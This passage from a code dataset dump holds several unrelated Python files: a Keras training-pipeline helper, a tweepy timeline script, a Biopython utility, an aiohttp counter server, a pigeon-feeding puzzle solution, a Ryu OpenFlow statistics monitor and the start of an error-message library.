y(x)), layers)\n\n\n# ============================================================================ #\n#                                  Controller                                  #\n# ============================================================================ #\nclass ModelController:\n    def __init__(self, m, path='pipeline_temp', ID=None):\n        # create data folder\n        self.m = m\n        self.path = path\n        self.history = {'history': [], 'loss_train': [], 'loss_valid': []}\n        self.loss_best = np.inf\n\n        if ID is None:\n            self.id = 'p' + time.strftime(\"%Y%m%d_%H%M%S\")\n        else:\n            self.id = ID\n\n        check_and_create_path(path)\n\n    def save_m(self, fName=None):\n        if fName is None:\n            fName = os.path.join(self.path, '%s_m' % self.id)\n        self.m.save(fName)\n        print('model saved')\n\n    def save_m_best(self, newLoss):\n        if newLoss < self.loss_best:\n            self.loss_best = newLoss\n            fName = os.path.join(self.path, '%s_m_best' % self.id)\n            self.m.save(fName)\n            print('New model saved')\n            isSaveNew = 1\n        else:\n            isSaveNew = 0\n        return isSaveNew\n\n    def plot_m(self):\n        filename = os.path.join(self.path, '%s_plot_m.png' % self.id)\n        plot_model(self.m, filename)\n\n    def genDefaultCallbacks(self, isSaveBestModel=True, isLogCSV=True, isSaveModel=True):\n        callbacks = []\n\n        # save the best model\n        if isSaveBestModel:\n            fName = os.path.join(self.path, '%s_CModelCheckpoint_best.hdf5' % self.id)\n            cb_ModelCheckpoint_best = ModelCheckpoint(fName, monitor='val_loss', save_best_only=True)\n            callbacks.append(cb_ModelCheckpoint_best)\n\n        # log history\n        if isLogCSV:\n            fName = os.path.join(self.path, '%s_CSVLogger.csv' % self.id)\n            cb_CSVLogger = CSVLogger(fName)\n            
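# Usage note (added comment): CSVLogger writes one CSV row per epoch (epoch,\n            # loss, val_loss, ...) to the file above; Pipeline.plot_history() later reloads\n            # this file with np.loadtxt and plots columns 1 and 2 as the training and\n            # validation loss curves.\n            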
callbacks.append(cb_CSVLogger)\n\n        # save all model history\n        if isSaveModel:\n            pathName = os.path.join(self.path, 'model_history_%s' % self.id)\n            check_and_create_path(pathName)\n            fName = os.path.join(pathName, '%s_CModelCheckpoint_{epoch:04d}.hdf5' % self.id)\n            cb_ModelCheckpoint = ModelCheckpoint(fName, monitor='val_loss')\n            callbacks.append(cb_ModelCheckpoint)\n\n        return callbacks\n\n\nclass Pipeline:\n    # ============================================================================ #\n    #                                  Initialise                                  #\n    # ============================================================================ #\n    def __init__(self, path='pipeline_temp', ID=None):\n        if ID is None:\n            ID = 'p' + time.strftime(\"%Y%m%d_%H%M%S\")\n        self.ID = ID\n        # create data folder\n        self.path = path\n        self.check_and_create_path()\n\n        # data\n        self.d_train = None  # should be a list [X, Y]\n        self.d_test = None  # should be a list [X, Y]\n        self.d_valid = None  # should be a list [X, Y]\n\n        # model\n        self.m = None\n\n        # fitting\n        self.history = None\n\n    # ============================================================================ #\n    #                             High Level Functions                             #\n    # ============================================================================ #\n    # Training ------------------------------------------------------------------- #\n    def fit(self, batch_size=32, epochs=10, callbacks=None, validation_split=0.0, useValidation_data=True):\n        if callbacks is None:\n            callbacks = self.defaultCallbacks()\n        if useValidation_data:\n            d_valid = self.d_valid\n        else:\n            d_valid = None\n        self.history = self.m.fit(self.d_train[0], self.d_train[1],\n                                  batch_size=batch_size,\n                                  epochs=epochs,\n                                  callbacks=callbacks,\n                                  validation_split=validation_split,\n                                  validation_data=d_valid)\n\n    # ============================================================================ #\n    #                                     Plot                                     #\n    # ============================================================================ #\n    def plot_m(self):\n        import matplotlib.image as mpimg\n        import matplotlib.pyplot as plt\n\n        fName = os.path.join(self.path, '%s_plot_m.png' % self.ID)\n        vis_utils.plot_model(self.m, show_shapes=True, to_file=fName)\n        img = mpimg.imread(fName)\n        try:\n            Popen(['eog', fName])\n        except OSError:\n            plt.imshow(img)\n\n    def plot_history(self):\n        import matplotlib.pyplot as plt\n\n        fName = os.path.join(self.path, '%s_CSVLogger.csv' % self.ID)\n        history = np.loadtxt(fName, skiprows=1, delimiter=',')\n        plt.ion()\n        plt.figure(figsize=(13, 5))\n        plt.plot(history[:, 1], label=\"training\")\n        plt.plot(history[:, 2], label=\"validation\")\n        plt.legend()\n        plt.xlabel('Epoch')\n        plt.ylabel('Loss')\n\n    # ============================================================================ #\n    #                                   callback                                   #\n    # ============================================================================ #\n    def defaultCallbacks(self):\n\n        # save the best model\n        fName = os.path.join(self.path, '%s_CModelCheckpoint_best.hdf5' % self.ID)\n        cb_ModelCheckpoint_best = ModelCheckpoint(fName, monitor='val_loss', save_best_only=True)\n\n        # log history\n        fName = os.path.join(self.path, '%s_CSVLogger.csv' % self.ID)\n        cb_CSVLogger = CSVLogger(fName)\n\n        # save all model history\n        pathName = os.path.join(self.path, 'model_history_%s' % self.ID)\n        self.check_and_create_path(pathName)\n\n        fName = os.path.join(pathName, '%s_CModelCheckpoint_{epoch:04d}.hdf5' % self.ID)\n        cb_ModelCheckpoint = ModelCheckpoint(fName, monitor='val_loss')\n\n        return [cb_ModelCheckpoint_best, cb_CSVLogger, cb_ModelCheckpoint]\n\n    # ============================================================================ #\n    
#                                   File I/O                                   #\n    # ============================================================================ #\n    def load(self, m=True, d_train=True, d_test=True, d_valid=True):\n        funMapping = {'m': [m, self.load_m],\n                      'd_train': [d_train, self.load_d_train],\n                      'd_test': [d_test, self.load_d_test],\n                      'd_valid': [d_valid, self.load_d_valid]}\n        for key, fun in funMapping.items():\n            try:\n                if fun[0]:\n                    fun[1]()\n                    print('')\n            except Exception as e:\n                print(e)\n                print(key + ': not loaded\\n')\n                print('')\n\n    def save(self, m=True, d_train=True, d_test=True, d_valid=True):\n        funMapping = {'m': [m, self.save_m],\n                      'd_train': [d_train, self.save_d_train],\n                      'd_test': [d_test, self.save_d_test],\n                      'd_valid': [d_valid, self.save_d_valid]}\n        for key, fun in funMapping.items():\n            try:\n                if fun[0]:  # if data exist, then save\n                    if getattr(self, key) is not None:\n                        fun[1]()  # run the save function\n                        print('')\n            except Exception as e:\n                print(e)\n                print(key + ': not saved\\n')\n                print('')\n        self.save_pipeline()\n\n    def read_d(self, d_train=True, d_test=True, d_valid=True):\n        funMapping = {'d_train': [d_train, self.read_d_train],\n                      'd_test': [d_test, self.read_d_test],\n                      'd_valid': [d_valid, self.read_d_valid]}\n        for key, fun in funMapping.items():\n            try:\n                if fun[0]:\n                    fun[1]()\n                    print('')\n            except Exception as e:\n                print(e)\n                print(key + ': not read\\n')\n                print('')\n\n    # ============================================================================ #\n    #                              Low-level File I/O                              #\n    # ============================================================================ #\n\n    # save ----------------------------------------------------------------------- #\n    def save_d_train(self):\n        fName = os.path.join(self.path, '%s_d_train.npz' % self.ID)\n        np.savez(fName, *self.d_train)\n        print('training data saved')\n\n    def save_d_valid(self):\n        fName = os.path.join(self.path, '%s_d_valid.npz' % self.ID)\n        np.savez(fName, *self.d_valid)\n        print('validation data saved')\n\n    def save_d_test(self):\n        fName = os.path.join(self.path, '%s_d_test.npz' % self.ID)\n        np.savez(fName, *self.d_test)\n        print('testing data saved')\n\n    def save_m(self):\n        fName = os.path.join(self.path, '%s_m' % self.ID)\n        self.m.save(fName)\n        print('model saved')\n\n    def save_pipeline(self):\n        ps = copy.copy(self)\n        ps.d_train = []\n        ps.d_test = []\n        ps.d_valid = []\n        ps.m = []\n\n        fName = os.path.join(self.path, '%s_pipeline' % self.ID)\n        she.save(fName, 'pipeline', ps)\n        print('Pipeline saved')\n\n    # load ----------------------------------------------------------------------- #\n    def load_d_train(self):\n        fName = os.path.join(self.path, '%s_d_train.npz' % self.ID)\n        d = np.load(fName)\n        d.files.sort()\n        self.d_train = [d[vName] for vName in d.files]\n        print('training data loaded')\n\n    def load_d_test(self):\n        fName = os.path.join(self.path, '%s_d_test.npz' % self.ID)\n        d = np.load(fName)\n        d.files.sort()\n        self.d_test = [d[vName] for vName in d.files]\n        print('testing data loaded')\n\n    def load_d_valid(self):\n        fName = os.path.join(self.path, '%s_d_valid.npz' % self.ID)\n        d = np.load(fName)\n        d.files.sort()\n        self.d_valid = [d[vName] for vName in d.files]\n        print('validation data loaded')\n\n    def load_m(self):\n        fName = os.path.join(self.path, '%s_m' % self.ID)\n        # keep the loaded model, otherwise this method has no effect\n        self.m = load_model(fName)\n        print('model loaded')\n\n    # ============================================================================ #\n    #                                   Utilities                                  #\n    # ============================================================================ #\n    def check_and_create_path(self, path=None):\n        if path is None:\n            path = self.path\n        if not 
os.path.exists(path):\n            os.makedirs(path)\n\n\ndef load_pipeline(fName):\n    p = she.load(fName, 'pipeline')\n    p.load()\n    return p\n\n\ndef load_pipeline_withBestModel(fName):\n    p = she.load(fName, 'pipeline')\n    p.load()\n    fName = os.path.join(p.path, '%s_CModelCheckpoint_best.hdf5' % p.ID)\n    p.m = load_model(fName)\n    return p\n","sub_path":"keras_ext.py","file_name":"keras_ext.py","file_ext":"py","file_size_in_byte":15728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"128716874","text":"#!/usr/bin/env python\nimport tweepy\n\nfrom keys1 import API_KEY, API_SECRET, TOKEN_KEY, TOKEN_SECRET, ACCOUNT\n\nauth = tweepy.OAuthHandler(API_KEY, API_SECRET)\nauth.set_access_token(TOKEN_KEY, TOKEN_SECRET)\napi = tweepy.API(auth)\n\n\ndef print_tweet(tweet):\n    print(\"%i\\t%s\\t%s\" %\n          (tweet.id,\n           tweet.user.name.ljust(20),\n           tweet.text.replace('&', '$')\n           .replace('\\n', ' ')\n           .replace('\\a', ' ')\n           .replace('\\t', ' ')\n           .replace('  *', ' ')))\n\n\ndef print_user(user):\n    print(\"%i\\t%s\\t%s\\t%s\\t%s\" %\n          (user.id,\n           user.name,\n           user.screen_name,\n           user.description.replace('&', '&')\n           .replace('\\n', ' ')\n           .replace('\\r', ' ')\n           .replace('\\t', ' ')\n           .replace('  *', ' '),\n           user.location))\n\n\ndef home_timeline():\n    for tweet in api.home_timeline(count=100):\n        if not tweet.text.startswith(\"RT\"):\n            print_tweet(tweet)\n\n\ndef user_timeline(user):\n    for tweet in api.user_timeline(user):\n        if not tweet.text.startswith(\"RT\"):\n            print_tweet(tweet)\n\n\ndef search_user(query):\n    for user in api.search_users(q=query):\n        print_user(user)\n\n\ndef list_followers():\n    followers = []\n    for user in api.followers():\n        print_user(user)\n        followers.append(user.id)\n    return followers\n\n\ndef list_friends():\n    friends = []\n    for id in api.friends_ids():\n        friend = api.get_user(id)\n        print_user(friend)\n        friends.append(friend.id)\n    return friends\n\n\ndef list_timelines():\n    for list in api.lists_all():\n        print(\"%s %s\" % (list.name, list.id))\n        for member in api.list_members(list_id=list.id):\n            print('-' + member.name)\n        for tweet in api.list_timeline(list_id=list.id):\n            if not tweet.text.startswith(\"RT\"):\n                print_tweet(tweet)\n\n\ndef list_list(lid):\n    members = []\n    for member in api.list_members(list_id=lid):\n        print_user(member)\n        members.append(member.id)\n    return members\n\n\ndef add_to_list(lid, users):\n    for user in users:\n        api.add_list_member(list_id=lid, user_id=user)\n\n\ndef remove_from_list(lid, users):\n    for user in users:\n        try:\n            api.remove_list_member(list_id=lid, user_id=user)\n        except:\n            print(user)\n\n\nprint(ACCOUNT)\nlist_friends()\nprint()\nlist_followers()\n\nprint('------')\n\nfrom keys1 import API_KEY, API_SECRET, TOKEN_KEY, TOKEN_SECRET\n\nauth = tweepy.OAuthHandler(API_KEY, API_SECRET)\nauth.set_access_token(TOKEN_KEY, TOKEN_SECRET)\napi = tweepy.API(auth)\n\nlist_friends()\nprint()\nlist_followers()\n","sub_path":"twitter/tweepy_timelines.py","file_name":"tweepy_timelines.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"158662441","text":"# Copyright (C) 2008 by Jes Frellsen, Ida Moltke and Martin Thiim\n# This code is part of the Biopython distribution and governed by its\n# license. 
Please see the LICENSE file that should have been included\n# as part of this package.\n\nimport numpy\nfrom numpy import array, zeros, ones\nfrom model import angle_id_pos, angle_pos, num_nodes, num_angles\n\n\n########## FUNCTION FOR MAKING DATA AND MISMASKS ##########\nangle_ids = [0.0, 1.0, 2.0, 6.0, 3.0, 4.0, 5.0]\n\ndef make_data_and_mism(len_nucs):\n \"\"\"\n Make a sequence and a mismask for model of length 'len_nucs'\n \"\"\"\n len_angles = len_nucs*num_angles\n\n data = zeros((len_angles, num_nodes))\n mism_sample = ones((len_angles, num_nodes), dtype=numpy.uint)\n mism = ones((len_angles, num_nodes), dtype=numpy.uint)\n\n # Set the angle IDs\n data[:,angle_id_pos] = array(angle_ids*len_nucs)\n mism_sample[:,angle_id_pos] = 0\n \n mism[:,angle_id_pos] = 0\n mism[:,angle_pos] = 0\n\n return data, mism_sample, mism\n \n\n########## FUNCTION FOR CONVERTING DATA INTO AN ANGLELIST ##########\n\ndef data_to_anglelist(data):\n length = data.shape[0]\n angle_list = map(lambda l: tuple(map(float, list(l))), data[:,angle_pos].reshape((length/7,7))[:,(0,1,2,4,5,6,3)])\n return angle_list\n","sub_path":"Bio/PDB/Barnacle/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"406273437","text":"#!/usr/local/bin/python3.5\nimport asyncio\nfrom datetime import datetime\nfrom aiohttp import web\nfrom aiohttp.web import View\nimport random\nfrom jinja2 import Template\n\nreq_count = 0\nreq_num = 0\n\nasync def print_count_info():\n while True:\n #import pdb; pdb.set_trace()\n print(\"Total Reqs:%s, ReqNum:%s\" % (req_count,req_num))\n await asyncio.sleep(4)\n\nasync def collect_data(request):\n global req_count, req_num\n jsdata = await request.json()\n print(\"jsdata:\",jsdata)\n #import pdb; pdb.set_trace()\n #req_num = request.query.get('reqnum')\n req_num = jsdata.get('count')\n #print(\"ReqNum:%s\" % (req_num))\n headers = {\"content_type\": \"text/html\", \"test\": \"YT\"}\n response = web.Response(body='ytest...', headers=headers)\n req_count += 1\n return response\n\nasync def info(request):\n global req_count, req_num\n #import pdb; pdb.set_trace()\n if(request.method == 'POST'):\n try:\n jsdata = await request.json()\n if(jsdata.get('action') == 'reset'):\n req_count = req_num = 0\n except Exception as e:\n print(\"Exception:%s\" % e)\n headers = {\"Content-Type\": \"text/html\", \"charset\": \"utf-8\"}\n tpl = '''\n \n

<html>\n    <body>\n        {{ name }}\n    </body>\n</html>
\n \n \n '''\n template = Template(tpl)\n #raw_html = template.render(name='YT')\n form = '''
'''\n    raw_html = \"<html><body><h1>test</h1>Total Reqs:%s, ReqNum:%s<br>
%s\" % (req_count,req_num,form)\n response = web.Response(body=raw_html, headers=headers)\n return response\n\n\ndef main():\n asyncio.ensure_future(print_count_info())\n app = web.Application()\n app.router.add_route(\"POST\", \"/test\", collect_data)\n app.router.add_route(\"GET\", \"/info\", info)\n app.router.add_route(\"POST\", \"/info\", info)\n\n loop = asyncio.get_event_loop()\n try:\n web.run_app(app)\n loop.run_forever()\n except KeyboardInterrupt as e:\n print(\"KeyboardInterrupt, cancel tasks...\")\n print(asyncio.gather(*asyncio.Task.all_tasks()).cancel())\n loop.stop()\n loop.run_forever()\n finally:\n loop.run_until_complete(asyncio.sleep(0))\n loop.close()\n\nif __name__ == '__main__':\n main()\n","sub_path":"python/Demo/Async/PyRunner/master_debug.py","file_name":"master_debug.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"489339853","text":"#-------------------------------------------------------------------------------\n# -*- coding: utf-8 -*-\n# Feed Pigeons: 少なくとも一つ餌を食べれるハトの数は?\n#\n# 【ルール】\n# ハトに餌をやる。1分毎にハトがやってきて、その数は変動する。\n# 1分目は1匹、2分目には2匹、・・・、N分目にはN匹、新しいハトがやってくる。\n# 一度来たハトは、飛び去ることはない。\n# 新しいハトがやってきた時は、前からいたハトから餌を食べる。\n#\n# 【入力】\n# N 餌の数が数値で入力される。0 < N < 10^5\n#\n# 【出力】\n# 少なくとも一つ餌を食べれるハトの数を、数値で出力せよ。\n#\n#-------------------------------------------------------------------------------\n\n# 【方針】\n# 全てのハトに餌が与えられるのがN分目の時まで、whileで回し続ける。\n# あとはN + 1分目の時に、どれだけ餌が与えられるかを考慮すれば良い。\n\ndef checkio(number):\n\n # 餌付け1分目の値\n pegeonAllNum = 1 # 全ハト数\n pegeonInc = 1 # ハトの増加量\n feed = 1 # N回目に全ハトに必要な餌量\n pegeonCount = 0 # N回目までの、餌付け完了したハト数\n\n # N分目の全てのハトに餌が行き渡る場合、\n # すなわち、残っている餌の手持ちnumber - N回目で必要な餌量feed > 0の場合。\n while number - feed > 0:\n pegeonCount += pegeonInc # ハトの増加量分だけカウント\n number -= pegeonAllNum # 餌の総量から全ハト数を引く\n\n # 後判定のための処理\n pegeonInc += 1 # N + 1分目のハトの増加量\n pegeonAllNum += pegeonInc # N + 1分目の全ハト数\n feed = pegeonAllNum # N + 1分目に必要な餌量\n\n\n pegeonAllNum -= pegeonInc # N分目までの全ハト数\n # N + 1分目で、新たに来たハトに対して餌を与えられる場合、\n # すなわち餌の手持ちnumber - N分目までの全ハト数 > 0の場合。\n if number - pegeonAllNum > 0:\n pegeonCount += number - pegeonAllNum\n\n return pegeonCount\n\nif __name__ == '__main__':\n #These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert checkio(1) == 1, \"1st example\"\n assert checkio(2) == 1, \"2nd example\"\n assert checkio(5) == 3, \"3rd example\"\n assert checkio(10) == 6, \"4th example\"","sub_path":"150626_checkio/checkio_home_FeedPigeons.py","file_name":"checkio_home_FeedPigeons.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"112767272","text":"from __future__ import division\nfrom operator import attrgetter\nfrom ryu.base import app_manager\nfrom ryu.controller import ofp_event\nfrom ryu.controller.handler import MAIN_DISPATCHER, DEAD_DISPATCHER\nfrom ryu.controller.handler import CONFIG_DISPATCHER\nfrom ryu.controller.handler import set_ev_cls\nfrom ryu.lib import hub\nfrom ryu.lib.packet import packet\nimport os.path\n\nOFP_SWITCHES_FLOW_STATS = \\\n './network-data2/ofp_switches_{0}_flow_stats.db'\nOFP_SWITCHES_FLOW_STATS_PREVIOUS = \\\n './network-data2/ofp_switches_{0}_flow_stats_prev.db'\nOFP_SWITCHES_PORT_STATS = \\\n './network-data2/ofp_switches_{0}_port_stats.db'\nOFP_SWITCHES_PORT_STATS_PREVIOUS = \\\n './network-data2/ofp_switches_{0}_port_stats_prev.db'\n\n\nclass MySimpleMonitor(app_manager.RyuApp):\n\n def 
__init__(self, *args, **kwargs):\n super(MySimpleMonitor, self).__init__(*args, **kwargs)\n self.datapaths = {}\n self.monitor_thread = hub.spawn(self._monitor)\n self.port_stats = {}\n self.port_speed = {}\n self.flow_stats = {}\n self.flow_speed = {}\n self.sleep = 10\n self.state_len = 3\n\n @set_ev_cls(ofp_event.EventOFPStateChange,\n [MAIN_DISPATCHER, DEAD_DISPATCHER])\n def _state_change_handler(self, ev):\n datapath = ev.datapath\n if ev.state == MAIN_DISPATCHER:\n if not datapath.id in self.datapaths:\n self.logger.debug('register datapath: %016x', datapath.id)\n self.datapaths[datapath.id] = datapath\n elif ev.state == DEAD_DISPATCHER:\n if datapath.id in self.datapaths:\n self.logger.debug('unregister datapath: %016x', datapath.id)\n del self.datapaths[datapath.id]\n\n # get the ports' features.\n @set_ev_cls(\n ofp_event.EventOFPStateChange,\n [MAIN_DISPATCHER, DEAD_DISPATCHER])\n def port_features_handler(self, ev):\n datapath = ev.datapath\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n def _monitor(self):\n while True:\n for dp in self.datapaths.values():\n self._request_stats(dp)\n hub.sleep(self.sleep)\n\n def _request_stats(self, datapath):\n self.logger.debug('send stats request: %016x', datapath.id)\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n req = parser.OFPFlowStatsRequest(datapath)\n datapath.send_msg(req)\n\n req = parser.OFPPortStatsRequest(datapath, 0, ofproto.OFPP_ANY)\n datapath.send_msg(req)\n\n def _save_stats(self, dist, key, value, length):\n if key not in dist:\n dist[key] = []\n dist[key].append(value)\n\n if len(dist[key]) > length:\n dist[key].pop(0)\n\n def _get_speed(self, now, pre, period):\n if period == 0:\n return\n return (now - pre) / period\n\n def _get_time(self, sec, nsec):\n return sec + nsec / (10**9)\n\n def _get_period(self, n_sec, n_nsec, p_sec, p_nsec):\n return self._get_time(n_sec, n_nsec) - self._get_time(p_sec, p_nsec)\n\n @set_ev_cls(ofp_event.EventOFPFlowStatsReply, MAIN_DISPATCHER)\n def _flow_stats_reply_handler(self, ev):\n # print \"simple_monitor.flow_stats:\"\n body = ev.msg.body\n switch_name = ev.msg.datapath.id\n with open(OFP_SWITCHES_FLOW_STATS.format(switch_name), 'w') as iff:\n # print \"writing to %s\" % (os.path.abspath(OFP_SWITCHES_FLOW_STATS.format(switch_name)))\n self.logger.debug(\"\\n> Flow Stats:\")\n self.logger.debug('datapath '\n 'hostname '\n 'in-port duration_sec duration_nsec '\n ' eth-dst out-port packets bytes')\n iff.write('datapath '\n 'hostname '\n 'in-port duration_sec duration_nsec '\n ' eth-dst out-port packets bytes\\n')\n self.logger.debug('---------------- '\n '---------------- '\n '-------- ---------------- -------------- '\n '---------------- -------- -------- --------')\n iff.write('---------------- '\n '---------------- '\n '-------- ---------------- -------------- '\n '---------------- -------- -------- --------\\n')\n for stat in sorted([flow for flow in body if flow.priority == 3],\n key=lambda flow: (flow.match['in_port'],\n flow.match['eth_dst'])):\n\n key = (\n stat.match['in_port'], stat.match['eth_dst'],\n stat.instructions[0].actions[0].port,)\n value = (\n stat.packet_count, stat.byte_count,\n stat.duration_sec, stat.duration_nsec)\n self._save_stats(self.flow_stats, key, value, self.state_len)\n\n # Get flow's speed.\n pre = 0\n period = self.sleep\n tmp = self.flow_stats[key]\n if len(tmp) > 1:\n pre = tmp[-2][1]\n period = self._get_period(\n tmp[-1][2], tmp[-1][3],\n tmp[-2][2], tmp[-2][3])\n\n speed = self._get_speed(\n 
self.flow_stats[key][-1][1], pre, period)\n\n self._save_stats(self.flow_speed, key, speed, self.state_len)\n\n iff.write('%16d %16s %8x %16d %16d %17s %8x %8d %8d' %\n (ev.msg.datapath.id,\n str(ev.msg.datapath.id),\n stat.match['in_port'], stat.duration_sec,\n stat.duration_nsec, stat.match['eth_dst'],\n stat.instructions[0].actions[0].port,\n stat.packet_count, stat.byte_count))\n iff.write(\"\\n\")\n self.logger.debug('%16d %16s %8x %16d %16d %17s %8x %8d %8d',\n ev.msg.datapath.id,\n str(ev.msg.datapath.id),\n stat.match['in_port'], stat.duration_sec,\n stat.duration_nsec, stat.match['eth_dst'],\n stat.instructions[0].actions[0].port,\n stat.packet_count, stat.byte_count)\n # print \"\\n%16d (%s %s %s ) [(%s %s %s %s)]\" % (ev.msg.datapath.id,\n # 'in_port', 'eth_dst', 'actions.port', 'packet_count', 'byte_count',\n # 'duration_sec', 'duration_nsec')\n # for key, val in self.flow_stats.items():\n # print key, \" \", val\n # print \"Flow speed\"\n # for key, val in self.flow_speed.items():\n # print key, val\n\n @set_ev_cls(ofp_event.EventOFPPortStatsReply, MAIN_DISPATCHER)\n def _port_stats_reply_handler(self, ev):\n # print \"simple_monitor.port_stats:\"\n body = ev.msg.body\n switch_name = ev.msg.datapath.id\n with open(OFP_SWITCHES_PORT_STATS.format(switch_name), 'w') as iff:\n # print \"writing to %s\" % (os.path.abspath(OFP_SWITCHES_PORT_STATS.format(switch_name)))\n self.logger.debug(\"\\n> Port Stats:\")\n self.logger.debug('datapath '\n 'hostname '\n 'port duration_sec duration_nsec '\n 'rx-pkts rx-bytes rx-error '\n 'tx-pkts tx-bytes tx-error')\n iff.write('datapath '\n 'hostname '\n 'port duration_sec duration_nsec '\n 'rx-pkts rx-bytes rx-error '\n 'tx-pkts tx-bytes tx-error\\n')\n self.logger.debug('---------------- '\n '-------------- '\n '-------- ---------------- -------------- '\n '-------- -------- -------- '\n '-------- -------- --------')\n iff.write('---------------- '\n '-------------- '\n '-------- ------------ -------------- '\n '-------- -------- -------- '\n '-------- -------- --------\\n')\n for stat in sorted(body, key=attrgetter('port_no')):\n key = (ev.msg.datapath.id, stat.port_no)\n value = (\n stat.rx_packets, stat.rx_bytes, stat.rx_errors,\n stat.duration_sec, stat.duration_nsec)\n\n self._save_stats(self.port_stats, key, value, self.state_len)\n\n # Get port speed.\n pre = 0\n period = self.sleep\n tmp = self.port_stats[key]\n if len(tmp) > 1:\n pre = tmp[-2][1]\n period = self._get_period(\n tmp[-1][3], tmp[-1][4],\n tmp[-2][3], tmp[-2][4])\n\n speed = self._get_speed(\n self.port_stats[key][-1][1], pre, period)\n\n self._save_stats(self.port_speed, key, speed, self.state_len)\n # print '\\n Speed: %s bytes\\/s\\n' % (self.port_speed)\n\n self.logger.debug('%016x %8s %8x %16d %16d %8d %8d %8d %8d %8d %8d',\n ev.msg.datapath.id,\n ev.msg.datapath.id,\n stat.port_no, stat.duration_sec, stat.duration_nsec,\n stat.rx_packets, stat.rx_bytes,\n stat.rx_errors, stat.tx_packets,\n stat.tx_bytes, stat.tx_errors)\n iff.write('%016x %8s %8x %16d %16d %8d %8d %8d %8d %8d %8d' %\n (ev.msg.datapath.id,\n ev.msg.datapath.id,\n stat.port_no, stat.duration_sec, stat.duration_nsec,\n stat.rx_packets, stat.rx_bytes, stat.rx_errors,\n stat.tx_packets, stat.tx_bytes, stat.tx_errors))\n iff.write(\"\\n\")\n\n # print \"\\n(%16d %s) [(%s %s %s %s %s)]\" % (ev.msg.datapath.id,\n # 'stat_port_no', 'rx_packets',\n # 'rx_bytes', 'rx_errors', 'duration_sec', 'duration_nsec')\n # for key, val in self.port_stats.items():\n # print key, \" \", val\n # print \"port speed\"\n # for 
key, val in self.port_speed.items():\n # print key, val\n","sub_path":"ryu/app/my_monitor_v1_topo_2.py","file_name":"my_monitor_v1_topo_2.py","file_ext":"py","file_size_in_byte":11031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"400780238","text":"\"\"\"Module handling the library of all existing errors\n\"\"\"\n\nfrom .error import Error\nfrom .log import Log\n\nclass ErrorLibException(Exception):\n \"\"\"Exception for internat errors of the library\n \"\"\"\n def __init__(self, message: str):\n \"\"\"\n Args:\n message (str): the internal error message\n \"\"\"\n self.message = message\n\nclass ErrorLibrary():\n \"\"\"Class for storing an error library\n\n Attributes:\n library [Error]: the list of errors/warnings in the library\n \"\"\"\n def __init__(self):\n self.library = []\n \n def get_error(self, code: str) -> Error:\n \"\"\"Gets the error from the library given an error code\n\n Can throw ErrorLibException\n\n Args:\n code (str): the code of the error\n \"\"\"\n for er in self.library:\n if er.code == code:\n return er\n\n raise ErrorLibException(\"Error code not in library\")\n\n def what_short(self, log: Log) -> str:\n \"\"\"Gets the short description of an error given a Log\n\n Can throw ErrorLibException\n\n Args:\n log (Log): log on basis of which to generate the error message\n \"\"\"\n return self.get_error(log.err_code).what_short(log.line)\n\n def what_long(self, log: Log) -> str:\n \"\"\"Gets the verbose description of an error given a Log\n\n Can throw ErrorLibException\n\n Args:\n log (Log): log on basis of which to generate the error message\n \"\"\"\n return self.get_error(log.err_code).what_long(log.line, log.args)\n\ndef get_error_lib():\n \"\"\"Gets the error library with the defined errors.\n \"\"\"\n lib = ErrorLibrary()\n\n # Errors\n\n # Macro Definition Errors\n # e10 args: 0 - name of incorrect macro\n e = Error(\"e10\", \"Incorrect Macro Name\")\n e.verbose = lambda args: \"Unexpected character encountered in macro \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n \n # e11 args: 0 - name of defined macro\n e = Error(\"e11\", \"Macro Already Defined\")\n e.verbose = lambda args: \"Macro \\\"\" + args[0] + \"\\\" already defined.\"\n lib.library.append(e)\n \n # e12 args: 0 - name of the macro\n # 1 - name of incorrect parameter\n e = Error(\"e12\", \"Incorrect Parameter Name\")\n e.verbose = lambda args: \"Unexpected character encountered in parameter name \\\"\" + args[1] + \"\\\" in macro \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n \n # e13 args: 0 - name of macro missing a body\n e = Error(\"e13\", \"Missing Macro Body\")\n e.verbose = lambda args: \"Macro \\\"\" + args[0] + \"\\\" is missing a body.\"\n lib.library.append(e)\n \n # e14 args: 0 - name of the macro\n # 1 - name of undefined parameter\n e = Error(\"e14\", \"Parameter Undefined\")\n e.verbose = lambda args: \"Parameter \\\"\" + args[1] + \"\\\" is not defined in macro \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n \n # e15 args: 0 - name of macro with call\n e = Error(\"e15\", \"Nested Call\")\n e.verbose = lambda args: \"Another macro called inside macro body of \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n \n # e16 args: 0 - name of macro with definition\n e = Error(\"e16\", \"Nested Definition\")\n e.verbose = lambda args: \"Another macro defined inside macro body of \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n \n # e17 args: 0 - name of the macro\n # 1 - name of repeated parameter\n e 
